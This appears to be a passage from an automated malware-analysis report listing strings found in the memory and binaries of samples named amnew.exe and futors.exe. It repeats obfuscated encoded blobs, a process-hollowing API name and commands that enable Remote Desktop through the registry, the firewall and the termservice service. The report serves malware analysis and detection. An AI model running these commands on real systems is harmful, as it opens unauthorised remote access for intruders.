Source: amnew.exe, 00000029.00000002.1626859136.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: amnew.exe, 00000029.00000002.1629365028.0000000004440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: amnew.exe, 00000029.00000002.1629365028.0000000004440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rmservice start= autonet start termservice" /add /t]
Source: amnew.exe, 00000029.00000000.1612265793.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: net start termservice
Source: amnew.exe, 00000029.00000000.1612265793.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: futors.exe, 0000002A.00000002.1629982840.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: net start termservice
Source: futors.exe, 0000002A.00000002.1629982840.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: futors.exe, 0000002A.00000000.1624957449.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: net start termservice
Source: futors.exe, 0000002A.00000000.1624957449.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: futors.exe, 0000002B.00000000.1630541824.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: net start termservice
Source: futors.exe, 0000002B.00000000.1630541824.0000000000E61000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
Source: amnew[1].exe.21.dr String found in binary or memory: net start termservice
Source: amnew[1].exe.21.dr String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu 
